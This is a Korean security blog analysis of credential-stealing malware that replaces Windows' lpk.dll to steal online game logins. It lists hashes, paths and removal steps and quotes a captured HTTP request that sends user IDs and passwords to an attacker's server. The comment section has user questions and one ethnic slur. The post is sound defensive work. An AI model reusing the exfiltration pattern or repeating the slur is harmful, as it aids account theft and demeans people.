본문 바로가기

벌새::Analysis

lpk.dll 시스템 파일을 패치하는 온라인 게임 탈취 악성코드 (2011.5.21)

반응형
중국에서 국내 온라인 게임 계정 탈취를 목적으로 제작된 악성코드 중에서는 Windows 시스템 파일을 패치(Patch)하는 방식을 많이 이용하고 있습니다.

기존의 comres.dll / imm32.dll / midimap.dll 파일과 더불어 최근에 lpk.dll 시스템 파일을 패치하는 방식이 발견되고 있습니다.

현재 국내에서 감염을 유발하는 방식은 대체로 악의적으로 변조된 국내 인터넷 사이트에 접속하는 시점에서 Internet Explorer 웹 브라우저 취약점, Adobe Flash Player 취약점을 이용한 방식으로 매월 정기적으로 제공되는 Windows 보안 패치 미설치자와 함께 Adobe Flash Player 최신 버전 미사용자의 경우에는 보안 제품의 진단이 이루어지지 않을 경우 자동으로 감염되고 있습니다.

단, 보안 패치가 잘 적용된 PC 환경에서는 보안 제품의 진단 능력에 상관없이 자동 감염이 이루어지지 않으므로 보안 패치의 중요성은 근본적인 문제 해결 방법입니다.

오늘 살펴볼 악성코드 파일(MD5 : 92ea08eb72789eb08acddfd392d8fa95)은 위에서 언급한 취약점을 이용하여 유포가 이루어지고 있는 것으로 추정되며, 감염시 정상적인 lpk.dll 시스템 파일을 패치하여 악용하는 사례입니다.

현재 안철수연구소(AhnLab) V3 보안 제품에서는 Dropper/Win32.OnlineGameHack 진단명으로 진단되며 알약(ALYac) 2.0 보안 제품에서는 Mal/EncPk-CK 진단명으로 사전 차단되고 있습니다.

[생성 파일 등록 / 진단 정보]

C:\WINDOWS\system32\2011521212529.dll :: lpk.dll 백업 파일(정상 파일)
※ 해당 파일은 감염 시간에 따라 파일명이 2011(Random 9~10자리 숫자).dll 패턴으로 생성됩니다.


C:\WINDOWS\system32\lpk.dll :: 변경 전 파일 크기 - 22,016 Bytes / 변경 후 파일 크기 : 33,593,490 Bytes
 - MD5 : FDDE6BE41D554BCDF8001A0F15868D8A

 - AhnLab V3 : Trojan/Win32.OnlineGameHack (VirusTotal : 5/42)

C:\WINDOWS\system32\lpk32.dll :: lpk.dll 백업 파일(정상 파일)

악성코드 감염시 윈도우 파일 보호(WFP) 기능을 무력화하여 정상적인 lpk.dll 파일을 lpk32.dll 파일로 백업을 하고, 악성 기능을 가진 lpk.dll 파일을 생성하고 있습니다.

 

패치된 lpk.dll 파일은 그림과 같이 중국에서 제작된 것으로 추정되며, 사용자가 웹 브라우저를 이용하여 특정 온라인 게임이 접속하여 로그인을 하는 과정에서 계정 정보(ID, 비밀번호 등)를 외부로 유출하고 있습니다.

참고로 lpk.dll 파일을 패치하면서 생성된 백업 파일(2011(Random 9~10자리 숫자).dll / lpk32.dll)은 그림과 같습니다.

 

 

실제 동작 과정을 살펴보면 사용자가 Internet Explorer 웹 브라우저를 실행할 경우 iexplore.exe 프로세스에 lpk.dll 악성 파일을 추가하며, 원래 정상적인 lpk.dll(Language Pack) 파일의 기능은 백업된 lpk32.dll 파일이 수행하는 것을 확인할 수 있습니다.

해당 악성코드에서는 피망(pmang.com), 메이플스토리(MapleStory), 던전앤파이터 등과 같은 온라인 게임 계정을 표적으로 하고 있으며, 실제 계정 탈취는 사례는 다음과 같습니다.
 
[피망 게임 계정 탈취 예시]

GET /yue/pm/mail.asp?a1=POKE&a3=(사용자 ID)&a4=(사용자 비밀번호) HTTP/1.1
User-Agent: WinInet
Host: www.laiqiana.com
Cache-Control: no-cache

h**p://www.laiqiana.com/y**/df/mail.asp
h**p://www.laiqiana.com/y**/dfofotp/mail.asp
h**p://www.laiqiana.com/y**/pm/mail.asp
h**p://www.laiqiana.com/y**/hg/mail.asp
h**p://www.laiqiana.com/y**/mxd/mail.asp
h**p://www.laiqiana.com/y**/t1/mail.asp
h**p://www.laiqiana.com/y**/mxdofotp/mail.asp

해당 악성코드에 감염된 사용자가 피망 게임에 접속하여 로그인을 시도할 경우 미국(USA)에 등록된 70.39.99.98 IP 주소로 로그인 정보가 유출되며, 해당 정보 수집을 한 범죄자는 사용자에게 금전적 손실을 유발할 것으로 추정됩니다.

이런 악성코드에 대해 수동으로 문제를 해결하기 위해서는 모든 프로그램을 종료한 상태에서 다음과 같은 절차에 따라 진행을 하시기 바랍니다.
 
  1. C:\WINDOWS\system32\lpk.dll 파일 확장자 변경 : (예) lpk.dll-
  2. 시스템 재부팅
  3. 윈도우 파일 보호(WFP) 기능을 통해 자동으로 정상적인 C:\WINDOWS\system32\lpk.dll 파일 생성

해당 절차대로 진행한 후, 생성되었던 파일(2011(Random 9~10자리 숫자).dll / lpk32.dll / lpk.dll-)을 수동으로 삭제하시기 바랍니다.

참고로 문제를 해결한 사용자는 반드시 추가적으로 보안 제품을 통한 정밀 검사, Windows 보안 패치, Adobe Flash Player 최신 버전 사용, 온라인 게임 계정 비밀번호 변경을 하시기 바랍니다.

위와 같이 정상적인 시스템 파일을 패치하는 방식을 통해 악성 파일을 찾기 매우 어려워지고 있으므로, 이런 류의 악성코드에 감염되지 않도록 하기 위해서는 보안 패치를 반드시 정기적으로 체크하여 업데이트하는 습관을 가지시기 바랍니다.

728x90
반응형
  • jodae 2011.06.12 21:25 댓글주소 수정/삭제 댓글쓰기

    lpk.dll 확장자명을 다른거로 바꿔주고 재부팅하면 (ex- lpk.dll-) lpk.dll- 하고 lpk.dll 이렇게 2개가되서 lpk.dll- <-요놈을 삭제하라는건가요?

    • lpk.dll- 방식으로 확장자를 변경한 이유가 악성 파일이므로 기능을 죽이기 위해서 였습니다.

      그러므로 확장자명을 변경한 lpk.dll- 이것을 삭제하시기 바랍니다.

      lpk.dll 파일을 삭제하시면 윈도우 고장납니다.^^

  • Temjin 2011.06.14 20:38 댓글주소 수정/삭제 댓글쓰기

    winxp sp3 시디를 못찾아서 전 다른방법으로 해결했어요.
    알고보니 lpk32.dll이 정상파일이더군요.

  • 어렵네요?;; 2011.06.15 17:04 댓글주소 수정/삭제 댓글쓰기

    방금전 알약 돌렸는데 _pz_LPK.DLL, 2011611174455.dll에 바이러스가 있어서 치료를 한 뒤 다시시작을 하니 파일들은 사라졌습니다(자동으로 삭제되나요?) 현재 바이러스를 치료해서 system32에 들어가보니 lpk.dll , lpk32.dll 파일이 있는데 무엇을 삭제해야 되는건가요? 둘 다 저작권 마이크로소프트사, 파일버젼 5.1.2600.5512입니다만... 삭제해야할 파일이 있다면 가르쳐주시면 안될까요?

    • http://hummingbird.tistory.com/3033

      이 내용이 최신 내용입니다. 외부에 알려진 게시글이 이 글이라서 이글을 참고하시는 것 같군요.

      lpk.dll 파일은 악성 파일이고 정상적인 lpk.dll 파일을 악성 파일이 자신으로 교체하면서 lpk32.dll 파일(정상)로 파일을 교체했습니다.

      그러므로 lpk.dll 파일 확장자를 변경하시면 자동으로 lpk.dll 파일이 복원되고 재부팅한 후에는 lpk.dll 확장자 변경된걸 삭제하시면 됩니다.

  • 조성식 2011.07.08 23:41 댓글주소 수정/삭제 댓글쓰기

    아무튼 씨바 짱깨새끼들은 도움이안되요